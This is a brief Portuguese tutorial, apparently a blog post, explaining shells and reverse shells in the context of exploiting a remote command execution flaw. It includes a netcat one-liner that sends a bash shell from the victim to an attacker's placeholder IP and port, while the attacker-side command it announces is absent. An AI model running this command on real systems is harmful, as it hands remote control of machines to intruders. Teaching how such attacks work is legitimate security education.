Shell

Antes de explicar o conceito de "Reverse Shell", é preciso dizer o que é uma Shell, não concordam? Uma shell é a ligação entre usuário e o sistema, ou seja o shell tem como objetivo interpretar comandos para o sistema e trazer os resultados desse comando.

Nesse caso estou estou executando o comando "ls", para listar arquivos e diretórios, isso é possível por causa estou em um shell!

Com o conceito de shell entendido, bora para a reverse!

Reverse Shell

Bom, é bem simples, o próprio nome deriva de "conexão reversa".

Imagine que você é o computador A e está atacando o B. Com isso, no desenvolver da sua exploração, você descobre uma falha que permite um RCE (Remote Command Execution), ou "Execução de Comando Remoto"

Dessa forma, você consegue executar comandos na máquina, mas ainda é muito limitado. Então você pode fazer com que o computador B, mande a shell dele para o seu, e dessa forma você pode ter controle sobre o seu alvo! :)

E um exemplo de obter uma reverse shell, pode ser utilizando o Netcat, veja a seguir:

Comando no computador da vítima:

ncat -e /bin/bash [IP do Atacante] [Porta do atacante]

Comando no computador do atacante:

Executando os passos acima, você conseguirá obter com sucesso uma shell reversa no alvo!